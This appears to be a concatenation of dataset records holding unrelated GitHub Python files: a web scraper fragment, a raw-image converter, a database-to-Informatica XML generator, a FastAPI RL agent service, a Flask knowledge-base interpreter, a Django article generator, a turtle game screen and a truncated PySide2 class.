input:nth-child(2)\")[0]['value']\n\n full_item_info['item_name'] = clean_string(item_name)\n full_item_info['item_price'] = item_price\n full_item_info['sold_so_far'] = extra_data[1]\n full_item_info['status'] = extra_data[0]\n full_item_info['location'] = location\n full_item_info['specs'] = item_specs_list\n full_item_info['characteristics'] = item_description_text\n full_item_info['id'] = item_id\n full_item_info['parent_url'] = parent_url\n full_item_info['original_url'] = item_work[1]['link']\n # the following values are added later in the process\n # item['subsection_name']\n # item['section_name']\n logging.debug(\"Full item info %s: \", full_item_info)\n\n # if product match the conditions add it\n if is_product_interesting(item_price, extra_data[1]):\n self.result[item_work[0]] = full_item_info\n # otherwise just skipped\n else:\n self.result[item_work[0]] = None\n except Exception as err:\n logging.error('Error with URL: %s, error: %s', item_work[1]['link'], err)\n self.result[item_work[0]] = None\n self.q.task_done()\n return True\n","repo_name":"rubancar/mercadolibre-scrapper","sub_path":"src/MercadoLibre/ItemParser.py","file_name":"ItemParser.py","file_ext":"py","file_size_in_byte":5603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"38326197212","text":"import rawpy\nimport numpy as np\n#import imageio\nimport cv2\nimport os\nimport sys\nimport time\nimport argparse\n\n# Save the file named imgname as destname assuming imgname is a raw picture format. \n# The resulting file, destname, should en with \".png\" and is the input image after\n# minimal demosaicing in png format with no compression.\ndef saveRawToPNG(imgname, destname):\n \n params = rawpy.Params(demosaic_algorithm=None, #parce que ça change rien de toute facon sur nos images\n fbdd_noise_reduction=rawpy.FBDDNoiseReductionMode.Full, #min noise\n use_auto_wb=True, # calculé auto par rawpy, selon le cours\n no_auto_bright=True, # pas de brightness auto pour ne pas modifier sans raison\n no_auto_scale=False, # selon moi la linéarisation parlé dans le cours\n output_color=rawpy.ColorSpace.Adobe, # car les artistes ont traviallé dans ADOBE qqch\n output_bps=8) # output jusqu'à 256\n\n\n \n rawimg = rawpy.imread(imgname)\n \n rawpng = rawimg.postprocess(params) \n # image qui se rapproche le plus de ce que les artistes ont importés dans leur programme qqch avant\n # de les retoucher, du coup le gan n'apprendrait li\n rawpng = cv2.cvtColor(rawpng, cv2.COLOR_BGR2RGB)\n cv2.imwrite(destname, rawpng, [int(cv2.IMWRITE_PNG_COMPRESSION), 0])\n #imageio.imsave(destname, rawpng)\n \n# reduce all image found under 'orig' with extention 'ext' to 'targetSize' \n# for the longest border and save the results under 'dest' with png format\n# and a compression of 0\ndef convert(orig, dest):\n ext = \".dng\"\n progress = 0\n for subdir, dirs, files in os.walk(orig):\n for file in files:\n filename = os.path.join(subdir, file)\n if file.endswith(ext):\n saveRawToPNG(filename, (dest+file).replace(ext,\".png\"))\n progress += 1\n print(\"progress: {}\".format(progress), end='\\r')\n\n# Converts all raw .dng image found under the file of name provided in the\n# input string parameter --origin to the folder of name provided in the input \n# string parameter --destination. The resulting format is png with no compression.\n# The resulting image is a demosaiced version of the original.\nif __name__ == '__main__':\n parse = argparse.ArgumentParser()\n \n parse.add_argument(\"-orig\", \"--origin\", help = 'the source folder', type = str)\n parse.add_argument(\"-dest\", \"--destination\", help = 'the destination folder', type = str)\n \n args = parse.parse_args()\n \n orig = args.origin \n dest = args.destination \n \n if orig is None:\n print(\"Origin folder required. Use --help.\")\n sys.exit()\n if dest is None:\n print(\"Destination folder required. Use --help.\")\n sys.exit()\n\nstart = time.perf_counter()\nconvert(orig, dest)\nprint(\"process took: {}s\".format(time.perf_counter()-start))","repo_name":"MarcBickel/CS-413","sub_path":"raw_to_adobe_png.py","file_name":"raw_to_adobe_png.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"18719540469","text":"import requests\nimport jinja2\nimport os\nimport mysql.connector\nimport cx_Oracle\nfrom bs4 import BeautifulSoup\nfrom mysql.connector import Error\nfrom cx_Oracle import Error\n\n\n\n############Function to get description tag values from a website############## \n\ndef getdata(link):\n #page = requests.get('https://issues.apache.org/jira/browse/HIVE-16998')\n page = requests.get(link)\n print(page)\n htmlContent = BeautifulSoup(page.content , \"html.parser\")\n description=htmlContent.find(id=\"description-val\").get_text()\n return description \n\n\n############Function to extract possible table name words############## \n\ndef extractTablename(data):\n words=data.split(\" \")\n tablename=[]\n for word in words:\n if \"_\" in word:\n tablename.append(word)\n return tablename\n\n\n############ Function to get informatice native data type ###########\n\ndataTypeDictionary={}\ndef convertDataType():\n mappingFile=open(\"mapping.csv\",'r')\n mappingData=mappingFile.read()\n line=mappingData.split('\\n')\n for record in line:\n data=record.split(',')\n if(len(data[0])>0):\n dataTypeDictionary[data[0]]=data[1]\n #for type1,type2 in dataTypeDictionary.items():\n #print(type1,type2)\n\n\n############Function to connect to Mysql##############\n\ndef connectToSource(data):\n try:\n conn = mysql.connector.connect(host='localhost',\n database='INFORMATION_SCHEMA',\n user='root',\n password='sak###')\n if conn.is_connected():\n print('Connected to MySQL database')\n output=[]\n cursor = conn.cursor()\n for table in data:\n sourcelist=[]\n query=(\"SELECT table_schema,table_name FROM INFORMATION_SCHEMA.tables where table_name=%s\")\n cursor.execute(query,(table,))\n results = cursor.fetchall()\n for row in results:\n print(\"Souce Table \"+row[1]+\" is present in schema \"+row[0])\n sourcelist.append('MySql')\n sourcelist.append(row[0])\n sourcelist.append(row[1])\n query=(\"Select DATA_TYPE,ORDINAL_POSITION,\"+\n \"CASE WHEN COLUMN_KEY='PRI' THEN 'PRIMARY KEY' WHEN COLUMN_KEY='' THEN 'NOT A KEY' END,\"+\n \"COALESCE(NUMERIC_PRECISION,DATETIME_PRECISION,0),COLUMN_NAME,\"+\n \"CASE WHEN IS_NULLABLE='NO' THEN 'NOTNULL' WHEN IS_NULLABLE='YES' THEN 'NULL' END,\"+\n \"COALESCE(NUMERIC_PRECISION,CHARACTER_MAXIMUM_LENGTH,DATETIME_PRECISION),COALESCE(NUMERIC_SCALE,0) from columns where table_name=%s\")\n cursor.execute(query,(row[1],))\n column_details=cursor.fetchall()\n #print(column_details) \n output.append([sourcelist,column_details])\n break\n return output\n \n except Error as e:\n print(e)\n \n finally:\n cursor.close()\n conn.close()\n\n\n\n############Function to connect to Oracle##############\n\ndef connectToTarget(data):\n connstr='scott/tiger'\n try:\n conn = cx_Oracle.connect(connstr)\n cursor = conn.cursor()\n output=[]\n for table in data:\n targetlist=[]\n query='Select owner,table_name,tablespace_name,cluster_name from all_tables where table_name=:1'\n cursor.execute(query,{'1':table.upper()})\n #print(cursor.statement)\n result=cursor.fetchall()\n #print(result)\n for row in result:\n print(\"Target Table \"+row[1]+\" is present in tablespace \"+row[2])\n targetlist.append('Oracle')\n targetlist.append(row[1])\n query='SELECT DATA_TYPE,COLUMN_ID,COLUMN_NAME,DATA_LENGTH,DATA_SCALE FROM ALL_TAB_COLUMNS WHERE TABLE_NAME=:1'\n cursor.execute(query,{'1':table.upper()})\n column_details=cursor.fetchall()\n #print(column_details)\n output.append([targetlist,column_details])\n break\n return output\n\n except Error as e:\n print(e)\n \n finally:\n cursor.close()\n conn.close()\n \n\n############Function to render Xml##############\n\ndef worflow(sourcedata,targetdata):\n\n repository ={'name': 'RS_Dev', 'version': '182', 'codepage': 'MS1252', 'database':'Oracle'}\n folder ={'name': 'Ankush', 'group': '', 'owner': 'Administrator', 'shared':'NOTSHARED'}\n mapping ={'name': 'm_DYNAMIC_FILTER_VIA_PARAMETER'}\n session ={'SCHEDULERNAME':'Scheduler','SERVERNAME':'RS_IS','SERVER_DOMAINNAME':'Domain_950'}\n env = jinja2.Environment(loader=jinja2.FileSystemLoader(searchpath=os.getcwd()))\n template = env.get_template('workflow.XML')\n finalOutput = template.render(repository=repository,folder=folder,\n sourcedata=sourcedata,targetdata=targetdata,\n mapping=mapping,dataTypeDictionary=dataTypeDictionary,session=session)\n outFile = open('test5.xml',\"w\")\n outFile.write(finalOutput)\n outFile.close()\n\n \n\n##########Main method#########\n \nif __name__ == \"__main__\":\n #link=input(\"Enter website link : \")\n #data=getdata(link)\n #print(data)\n #tablename=extractTablename(data)\n convertDataType()\n sourcedata=connectToSource(['review','REVIEW_WRHS'])\n targetdata=connectToTarget(['review','REVIEW_WRHS'])\n worflow(sourcedata,targetdata)\n","repo_name":"ankushagarwal87/Python","sub_path":"Informatica Mapping Generation/Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":5706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"43531091581","text":"import logging\nimport math\nimport sys\nfrom collections import deque\nfrom dataclasses import asdict\nfrom datetime import datetime, timedelta\nfrom typing import List, Optional\n\nimport requests\nfrom ai_traineree.agents.agent_factory import AgentFactory\nfrom ai_traineree.types import AgentState, Experience\nfrom ai_traineree.types.primitive import ObservationType\nfrom fastapi import Depends, FastAPI, HTTPException\nfrom pydantic import BaseSettings, root_validator\n\nfrom .types import AgentAction, AgentCreate, AgentInfo, AgentLoss, AgentStateJSON, AgentStep, DataSpace\nfrom .utils import dataspace_fix, decode_pickle, encode_pickle\n\n# Initiate module with setting up a server\napp = FastAPI(\n title=\"Agents Bar - Agent\",\n description=\"Agents Bar compatible Agent entity\",\n docs_url=\"/docs\",\n version=\"0.1.2\",\n)\nlogging.basicConfig(level=logging.INFO, stream=sys.stdout)\nlogger = logging.getLogger()\n\nSUPPORTED_AGENTS = (\"DQN\", \"PPO\", \"DDPG\", \"SAC\", \"D3PG\", \"D4PG\", \"RAINBOW\", \"TD3\")\n\n\nclass AgentSettings(BaseSettings):\n AGENT_ID: Optional[int]\n TOKEN: Optional[str]\n URL: Optional[str] = \"http://backend/api/v1/snapshots/auto\"\n STANDALONE: bool = True\n\n @root_validator\n def check_not_standalone(cls, values):\n standalone = values.get(\"STANDALONE\")\n if not standalone:\n assert all([v is not None for v in values.values()]), f\"No value should be None. {values.items()}\"\n return values\n\n\nagent = None\nlast_step = {}\nlast_active = datetime.utcnow()\nlast_metrics_time = datetime.utcnow()\nmetrics_buffer = deque(maxlen=20)\n\n\ndef global_agent():\n \"Global agent handling. It's mainly a helper function to handle exception.\"\n global agent\n if agent is None:\n raise HTTPException(status_code=404, detail=\"No agent found\")\n return agent\n\n\n@app.get(\"/ping\")\ndef ping():\n return {\"msg\": \"All good\"}\n\n\n@app.post(\"/agent\", status_code=201)\ndef api_post_agent(agent_create: AgentCreate):\n \"\"\"Create agent.\n\n The agent is reused by other methods. There is no \"update\" method to agent's interal state\n so in case it needs changes it should be deleted and recreated.\n\n \"\"\"\n global agent\n\n if agent_create.model_type.upper() not in SUPPORTED_AGENTS:\n raise HTTPException(status_code=400, detail=f\"Only {SUPPORTED_AGENTS} agent types are supported\")\n\n config = agent_create.model_config or {}\n agent_create.obs_space.shape = tuple(agent_create.obs_space.shape)\n agent_create.action_space.shape = tuple(agent_create.action_space.shape)\n config[\"obs_space\"] = agent_create.obs_space\n config[\"action_space\"] = agent_create.action_space\n\n network_state = agent_create.network_state\n buffer_state = agent_create.buffer_state\n\n agent_state = AgentState(\n model=agent_create.model_type,\n obs_space=agent_create.obs_space,\n action_space=agent_create.action_space,\n config=config,\n network=network_state,\n buffer=buffer_state,\n )\n try:\n agent = AgentFactory.from_state(agent_state)\n except:\n raise HTTPException(\n status_code=400,\n detail=\"It's not clear how you got here. Well done. But that's incorrect. Please select supported agent.\",\n )\n\n return {\"response\": \"Successfully created a new agent\"}\n\n\n@app.delete(\"/agent/{agent_name}\", status_code=204)\ndef api_delete_agent(agent_name: str, agent=Depends(global_agent)):\n \"\"\"Deletes agent and all related attribute. A hard reset.\n\n Agent name (reference) is necessary to prevent accidental deletion.\n \"\"\"\n if agent.name == agent_name:\n agent = None\n return {\"response\": \"Deleted successfully.\"}\n\n raise HTTPException(status_code=404, detail=f\"Agent '{agent_name}' not found\")\n\n\n@app.get(\"/agent\", response_model=AgentInfo)\ndef api_get_agent_info(agent=Depends(global_agent)):\n \"\"\"Describes agent.\n\n Provides summary information of the agent.\n The method should be relatively light.\n \"\"\"\n discret = agent.model.upper() in (\"DQN\", \"RAINBOW\")\n return AgentInfo(\n model=agent.model,\n hyperparameters=agent.hparams,\n last_active=last_active,\n discret=discret,\n )\n\n\n@app.get(\"/agent/state\", response_model=AgentStateJSON)\ndef api_get_agent_state(agent=Depends(global_agent)):\n \"\"\"Retruns agent's state.\n\n The state should be sufficient to fully describe and reconstruct the agent.\n It might be that in some situations the reconstructed agent doesn't produce\n the exact same output, e.g. due to internal randomness, but statistically\n they need to be the same.\n\n \"\"\"\n agent_state = agent.get_state()\n agent_config = agent_state.config\n agent_config[\"device\"] = str(agent_config.get(\"device\", \"cpu\"))\n\n if \"obs_space\" in agent_config:\n del agent_config[\"obs_space\"]\n if \"action_space\" in agent_config:\n del agent_config[\"action_space\"]\n\n return AgentStateJSON(\n model=agent_state.model,\n obs_space=asdict(agent_state.obs_space),\n action_space=asdict(agent_state.action_space),\n encoded_config=encode_pickle(agent_config),\n encoded_network=encode_pickle(agent_state.network),\n encoded_buffer=encode_pickle(agent_state.buffer),\n )\n\n\n@app.get(\"/agent/last_active\", response_model=datetime)\ndef api_get_agent_last_active(agent=Depends(global_agent)):\n \"\"\"Returns timestamp of agent's latest usage.\"\"\"\n return last_active\n\n\n@app.get(\"/agent/hparams\")\ndef api_get_agent_hparasm(agent=Depends(global_agent)):\n \"\"\"Returns hashmap of agent's hyperparameters.\"\"\"\n print(agent.hparams)\n return {\"hyperparameters\": agent.hparams}\n\n\n@app.get(\"/agent/loss\", response_model=List[AgentLoss])\ndef api_get_agent_loss(last_samples: int = 1, agent=Depends(global_agent)):\n \"\"\"Returns agent's loss values.\n\n By default it only returns the most recent metrics, i.e. single timestamp.\n Max timestamp values is based on the agent's intialization.\n \"\"\"\n if len(metrics_buffer) == 0:\n raise HTTPException(\n status_code=400,\n detail=f\"Not enough collected samples. Current count is {len(metrics_buffer)}.\",\n )\n beg_idx = max(0, len(metrics_buffer) - last_samples)\n return [metrics_buffer[i] for i in range(beg_idx, len(metrics_buffer))]\n\n\n@app.post(\"/agent/step\", status_code=200)\ndef api_post_agent_step(step: AgentStep, commit: bool = True, agent=Depends(global_agent)):\n \"\"\"Feed agent with step information.\n\n The minimum required is the current state and reward.\n Some agents, for convinience, might also require passing last action,\n auxilary infrmation whether state is terminal (done) and the next state.\n\n By default, the Step is committed to the agent in the request.\n In case it's needed to delay committing, e.g. gathering all information first,\n one can use `/agent/commit` method.\n\n \"\"\"\n # TODO: Agent should have a property whether it's discrete\n global last_active, last_step\n last_active = datetime.utcnow()\n if agent.model in (\"DQN\", \"Rainbow\"):\n action = int(step.action[0])\n else:\n action = step.action\n\n last_step = dict(\n last_step_obs=step.obs,\n last_action=action,\n last_step_reward=step.reward,\n last_step_next_obs=step.next_obs,\n last_step_done=step.done,\n )\n if commit:\n agent_commit(agent)\n return {\"response\": \"Stepping\"}\n\n return {\"response\": \"Submitted\"}\n\n\n@app.post(\"/agent/commit\", status_code=200)\ndef api_post_agent_commit(agent=Depends(global_agent)):\n \"\"\"Commits submitted step into Agent.\n\n Before using this method the data needs to be submitted using `/agent/step`.\n \"\"\"\n global last_active, last_step\n last_active = datetime.utcnow()\n agent_commit(agent)\n\n\n@app.post(\"/agent/reset\", status_code=200)\ndef api_post_agent_reset(agent=Depends(global_agent)):\n \"\"\"Resets Agent.\n\n Clears Agents states.\n \"\"\"\n agent.reset()\n\n\n@app.post(\"/agent/act\", response_model=AgentAction)\ndef api_post_agent_act(state: ObservationType, noise: float = 0.0, agent=Depends(global_agent)):\n \"\"\"Infers action based on provided observation.\"\"\"\n global last_active\n last_active = datetime.utcnow()\n try:\n exp = Experience(obs=state)\n exp = agent.act(exp, noise)\n action = exp.action\n except Exception as e:\n logger.exception(\"Failed to exceute `agent.act` with state=%s and noise=%s\", str(state), str(noise))\n raise HTTPException(status_code=500, detail=f\"Sorry :(\\n{e}\")\n\n collect_metrics()\n return AgentAction(action=action)\n\n\ndef agent_commit(agent):\n global last_step\n assert agent is not None, \"Agent needs to be initialized\"\n\n agent.step(\n Experience(\n obs=last_step[\"last_step_obs\"],\n action=last_step[\"last_action\"],\n reward=last_step[\"last_step_reward\"],\n next_obs=last_step[\"last_step_next_obs\"],\n done=last_step[\"last_step_done\"],\n )\n )\n last_step = {} # Empty once used\n\n collect_metrics()\n\n\ndef collect_metrics(wait_seconds: int = 20):\n global last_metrics_time\n if agent is None:\n raise ValueError(\"Agent needs to be initiated before it can be used\")\n\n now_time = datetime.utcnow()\n if now_time < last_metrics_time + timedelta(seconds=wait_seconds):\n return\n\n loss = {k: v if not (math.isinf(v) or math.isnan(v)) else None for (k, v) in agent.loss.items()}\n loss[\"time\"] = now_time.timestamp()\n metrics_buffer.append(loss)\n last_metrics_time = now_time\n\n\ndef sync_agent_state(agent_id: int, token: str) -> AgentState:\n logging.info(\"Synchronizing agent with the backend\")\n url = f\"{AgentSettings().URL}/{agent_id}\"\n response = requests.get(url, headers={\"token\": token})\n data = response.json()\n agent_type = data[\"model\"].upper()\n\n obs_space = dataspace_fix(data.pop(\"obs_space\"))\n action_space = dataspace_fix(data.pop(\"action_space\"))\n\n agent_config = decode_pickle(data[\"encoded_config\"])\n network_state = decode_pickle(data[\"encoded_network\"])\n buffer_state = decode_pickle(data[\"encoded_buffer\"])\n\n if \"obs_space\" in agent_config:\n agent_config.pop(\"obs_space\")\n if \"action_space\" in agent_config:\n agent_config.pop(\"action_space\")\n\n return AgentState(\n model=agent_type,\n obs_space=DataSpace(**obs_space),\n action_space=DataSpace(**action_space),\n config=agent_config,\n network=network_state,\n buffer=buffer_state,\n )\n\n\n##############################\n# MAIN\n\nconfig = AgentSettings()\n\nif not config.STANDALONE:\n if config.AGENT_ID is None or config.TOKEN is None:\n raise ValueError(\"\")\n state = sync_agent_state(config.AGENT_ID, config.TOKEN)\n agent = AgentFactory.from_state(state=state)\n print(\"Initiated agent: \" + str(agent))\n","repo_name":"Agents-Bar/agents-bar-agent","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"71680071034","text":"# coding=utf-8\nimport os\nimport json\nimport pickle\n\n\nimport numpy as np\nimport msgpack\nimport datetime\nimport json\nfrom flask import Flask, request, jsonify\napp = Flask(__name__)\n\nclass Interpreter():\n def __init__(self, freebase_dir):\n self.map_program_to_func = {}\n self.map_program_to_func[\"gen_set1\"] = self.execute_gen_set1\n self.map_program_to_func[\"gen_set2\"] = self.execute_gen_set2\n self.map_program_to_func[\"gen_set1_date\"] = self.execute_gen_set1\n self.map_program_to_func[\"gen_set2_date\"] = self.execute_gen_set2_date\n self.map_program_to_func[\"select_oper_date_lt\"] = self.execute_select_oper_date_lt\n self.map_program_to_func[\"select_oper_date_gt\"] = self.execute_select_oper_date_gt\n self.map_program_to_func[\"gen_set2_dateconstrained\"] = self.execute_gen_set2_dateconstrained\n self.map_program_to_func[\"gen_set2_date_dateconstrained\"] = self.execute_gen_set2_date_dateconstrained\n self.map_program_to_func[\"set_oper_ints\"] = self.execute_set_oper_ints\n self.map_program_to_func[\"none\"] = self.execute_none\n self.map_program_to_func[\"terminate\"] = self.execute_terminate\n\n # 包含在图谱中\n def is_kb_consistent(self, e, r):\n print(\"find\", e ,r)\n if e in self.freebase_kb and r in self.freebase_kb[e]:\n return True\n else:\n return False\n\n # 通过实体-关系 查找 三元组 类似select\n def execute_gen_set1(self, argument_value, argument_location):\n entity = argument_value[0]\n relation = argument_value[1]\n if entity is None or relation is None:\n return set([]), 1\n tuple_set = None\n if entity in self.freebase_kb and relation in self.freebase_kb[entity]:\n tuple_set = self.freebase_kb[entity][relation]\n return tuple_set, 0\n\n # 通过实体-关系 查找所有时间三元组\n def execute_gen_set1_date(self, argument_value, argument_location):\n entity = argument_value[0]\n relation_date = argument_value[1]\n if entity is None or relation_date is None:\n return set([]), 1\n tuple_set = None\n if entity in self.freebase_kb and relation_date in self.freebase_kb[entity]:\n tuple_set = {d: entity for d in self.freebase_kb[entity][relation_date]}\n return tuple_set, 0\n\n def execute_gen_set2(self, argument_value, argument_location):\n set_ent, _ = self.execute_gen_set1(argument_value, argument_location)\n relation = argument_value[2]\n if set_ent is None or relation is None:\n return set([]), 1\n tuple_set = None\n for e in set_ent:\n if e in self.freebase_kb and relation in self.freebase_kb[e]:\n if tuple_set is None:\n tuple_set = set(self.freebase_kb[e][relation])\n else:\n tuple_set.update(set(self.freebase_kb[e][relation]))\n return tuple_set, 0\n\n # tails中有没有和y同一年的\n def same_year(self, tails, y):\n for t in tails:\n t = self.convert_to_date(t).year\n if t == y:\n return True\n return False\n\n # 不自然的时间\n def execute_gen_set2_dateconstrained(self, argument_value, argument_location):\n set_ent, _ = self.execute_gen_set1(argument_value, argument_location)\n relation = argument_value[2]\n constr_rel_date = argument_value[3]\n constr_date = argument_value[4]\n if set_ent is None or relation is None or constr_rel_date is None or constr_date is None:\n return set([]), 1\n constr_year = constr_date.year\n tuple_set = None\n for e in set_ent:\n if e in self.freebase_kb and constr_rel_date in self.freebase_kb[e] and self.same_year(\n self.freebase_kb[e][constr_rel_date], constr_year):\n if relation not in self.freebase_kb[e]:\n continue\n if tuple_set is None:\n tuple_set = set(self.freebase_kb[e][relation])\n else:\n tuple_set.update(set(self.freebase_kb[e][relation]))\n return tuple_set, 0\n\n def execute_gen_set2_date(self, argument_value, argument_location):\n set_ent, _ = self.execute_gen_set1(argument_value, argument_location)\n relation_date = argument_value[2]\n if set_ent is None or relation_date is None:\n return set([]), 1\n tuple_set = None\n for e in set_ent:\n if e in self.freebase_kb and relation_date in self.freebase_kb[e]:\n if tuple_set is None:\n tuple_set = set(self.freebase_kb[e][relation_date])\n else:\n tuple_set.update(set(self.freebase_kb[e][relation_date]))\n return tuple_set, 0\n\n # 不自然的时间\n def execute_gen_set2_date_dateconstrained(self, argument_value, argument_location):\n set_ent, _ = self.execute_gen_set1(argument_value, argument_location)\n relation_date = argument_value[2]\n constr_rel_date = argument_value[3]\n constr_date = argument_value[4]\n if set_ent is None or relation_date is None or constr_rel_date is None or constr_date is None:\n return set([]), 1\n constr_year = constr_date.year\n tuple_set = None\n for e in set_ent:\n if e in self.freebase_kb and constr_rel_date in self.freebase_kb[e] and self.same_year(\n self.freebase_kb[e][constr_rel_date], constr_year):\n if relation_date not in self.freebase_kb[e]:\n continue\n if tuple_set is None:\n tuple_set = set(self.freebase_kb[e][relation_date])\n else:\n tuple_set.update(set(self.freebase_kb[e][relation_date]))\n return tuple_set, 0\n\n # 并\n def execute_set_oper_ints(self, argument_value, argument_location):\n set_ent1 = argument_value[0]\n set_ent2 = argument_value[1]\n if set_ent1 is None or set_ent2 is None:\n return set([]), 1\n set_ent_ints = set(set_ent1).intersection(set(set_ent2))\n flag = 0\n if argument_location is not None:\n argument_location1 = argument_location[0]\n argument_location2 = argument_location[1]\n if argument_location1 == argument_location2:\n flag = 0.1\n return set_ent_ints, flag\n\n # 转为日期\n def convert_to_date(self, x):\n if x.startswith('m.'):\n return None\n if 'T' in x:\n x = x.split('T')[0]\n if len(x.split('-')) == 1:\n x = x + '-01-01'\n elif len(x.split('-')) == 2:\n x = x + '-01'\n try:\n yyyy = int(x.split('-')[0])\n mm = int(x.split('-')[1])\n dd = int(x.split('-')[2])\n d = datetime.datetime(yyyy, mm, dd)\n return d\n except:\n return None\n\n # 小于等于date时间的集合\n def execute_select_oper_date_lt(self, argument_value, argument_location):\n set_date = argument_value[0]\n date = argument_value[1]\n if set_date is None or date is None:\n return set([]), 1\n set_date = set([self.convert_to_date(d) for d in set_date])\n date = self.convert_to_date(date)\n subset_date = set([])\n for d, e in set_date.items():\n if d <= date:\n subset_date.add(e)\n return subset_date, 0\n\n # 大于等于date时间的集合\n def execute_select_oper_date_gt(self, argument_value, argument_location):\n set_date = argument_value[0]\n date = argument_value[1]\n if set_date is None or date is None:\n return set([]), 1\n set_date = set([self.convert_to_date(d) for d in set_date])\n date = self.convert_to_date(date)\n subset_date = set([])\n for d, e in set_date.items():\n if d >= date:\n subset_date.add(e)\n return subset_date, 0\n\n def execute_none(self, argument_value, argument_location):\n return None, 0\n\n def execute_terminate(self, argument_value, argument_location):\n return None, 0\n\n\n@app.route('/post', methods = ['POST'])\ndef post_res():\n response={}\n jsonpack = json.loads(request.json)\n if jsonpack['op'] == \"find\":\n response['content']=interpreter.is_kb_consistent(jsonpack['sub'],jsonpack['pre'])\n elif jsonpack['op']==\"execute_gen_set1\":\n response['content']=interpreter.execute_gen_set1(jsonpack['sub_pre'], \"\")\n\n # elif jsonpack['op']==\"find_reverse\":\n # response['content']=find_reverse(jsonpack['obj'],jsonpack['pre'])\n # elif jsonpack['op']==\"is_A\":\n # response['content']=is_A(jsonpack['entity'])\n # elif jsonpack['op']==\"select\":\n # response['content']=interpreter.execute_gen_set1(jsonpack['sub'],jsonpack['pre'],jsonpack['obj'])\n # elif jsonpack['op']==\"select_All\":\n # response['content']=interpreter.execute_gen_set1(jsonpack['sub'],jsonpack['pre'],jsonpack['obj'])\n # elif jsonpack['op']==\"is_All\":\n # response['content']=is_All(jsonpack['type'])\n return jsonify(response)\n \n\nif __name__ == '__main__':\n print(\"loading knowledge base...\")\n interpreter = Interpreter(\"\")\n interpreter.freebase_kb = json.load(open('webQSP_freebase_subgraph.json'))\n print(\"loading knowledge down, start the server\")\n\n app.run(host='127.0.0.1', port=5001, use_debugger=True)\n","repo_name":"coin-qa-group/NS-CQA","sub_path":"S2SRL/webqspUtil/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":9539,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"28000013436","text":"from django.core.exceptions import EmptyResultSet\nfrom django.db.utils import IntegrityError\nfrom django.core.management.base import BaseCommand, CommandError\nfrom backend.generator.combinator import Combinator\nfrom backend.corpora.manager import get_active_categories\n\nclass Command(BaseCommand):\n help = 'Generates an article'\n\n def add_arguments(self, parser):\n parser.add_argument('--category', nargs=1, type=str, default=['politics'])\n parser.add_argument('--outlet', nargs=1, type=str, default=['edition-cnn', 'cnn-money'])\n parser.add_argument('--content-type', nargs=1, type=str, default=['news'])\n parser.add_argument('--active-categories', nargs=1, type=bool, default=[False])\n parser.add_argument('--fake-link', nargs=1, type=bool, default=[False])\n parser.add_argument('--amount', nargs=1, type=int, default=[1])\n\n def handle(self, *args, **options):\n self.stdout.write('Generating new text:')\n\n if options['active_categories'][0]:\n categories = [c.slug for c in get_active_categories().filter(generateable=True)]\n for category in categories:\n self.generate(options['amount'][0], fake_link=options['fake_link'][0], category=category)\n\n for category, outlet, content_type in zip(options['category'], options['outlet'], options['content_type']):\n self.generate(options['amount'][0], fake_link=options['fake_link'][0], category=category, outlet=outlet, content_type=content_type)\n\n def generate(self, amount, **kwargs):\n combinator = Combinator(**kwargs)\n msg = ''\n for k, v in kwargs.items():\n msg += '{}: {} '.format(k, v)\n self.stdout.write(msg)\n\n for i in range(0, amount):\n self.combinate(combinator)\n\n def combinate(self, combinator):\n combinator.generate()\n\n try:\n combinator.finalize()\n except IntegrityError:\n self.stdout.write('Generated Document Not Unique. Retrying ...')\n self.combinate(combinator)\n except AttributeError:\n self.stdout.write('Malformed Document. Retrying ...')\n self.combinate(combinator)\n except Exception as e:\n self.stdout.write('Error: {} Retrying ...'.format(e))\n self.combinate(combinator)\n","repo_name":"TheWeeklyOutput/TWO-Backend","sub_path":"generator/management/commands/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"15724604754","text":"\"\"\" Projet - Fin d'une partie\n\nfait le 17/05/2023 par Jason\"\"\"\n\nfrom turtle import Turtle\n\n\ndef fin(message):\n \"\"\" Fonction qui affiche le message\n 'GAME OVER' à la fin d'une partie \"\"\"\n stylo_fin = Turtle()\n stylo_fin.speed(0)\n stylo_fin.color(\"Red\")\n stylo_fin.penup()\n stylo_fin.goto(0, 0)\n stylo_fin.write(message, move = False, align = \"center\",\n font = (\"Courier\" , 72, \"bold\"))\n stylo_fin.hideturtle()\n\n\n\ndef relancer(message):\n \"\"\" Fonction qui explique comment relancer une nouvelle partie \"\"\"\n stylo_rejouer = Turtle()\n stylo_rejouer.speed(0)\n stylo_rejouer.color(\"Yellow\")\n stylo_rejouer.penup()\n stylo_rejouer.hideturtle()\n stylo_rejouer.goto(0, -50)\n stylo_rejouer.write(message, move=False, align = \"center\",\n font = (\"Courier\", 20, \"bold\"))\n stylo_rejouer.hideturtle()\n","repo_name":"zW1ck3dz/Space-Invaders","sub_path":"game_over.py","file_name":"game_over.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"38653906383","text":"\"\"\"Keeps the state of the GUI and related signals / slots.\"\"\"\n\nfrom PySide2.QtCore import QObject, Signal, Slot\n\n\nclass _StateKeeper(QObject):\n \"\"\"Used as a singleton to enable communication between objects that don't have a direct relationship.\n\n In the section `Other Parameters`, all Signals are listed. You can emit a certain signal by calling\n `StateKeeper.<signal name>.emit(<potential arguments, like a text>). Slots are listed as Methods and you can\n connect to them like this: `StateKeeper.<slot name>.connect(<the method you want to call upon emission of that\n signal>).\n\n Attributes\n ----------\n current_frame\n The frame that is shown by :class:`mad_gui.VideoWindow`\n label_state\n One of the states \"add\", \"remove\", \"edit\", or \"investigate\". State information is color-coded by the buttons\n in the\n upper part of the GUI. Can be changed by mouse-click or shortcuts \"a\", \"e\", or \"Esc\".\n gui_has_unsaved_changes\n Keeps information if there has been any user interaction since last time data was either exported using\n 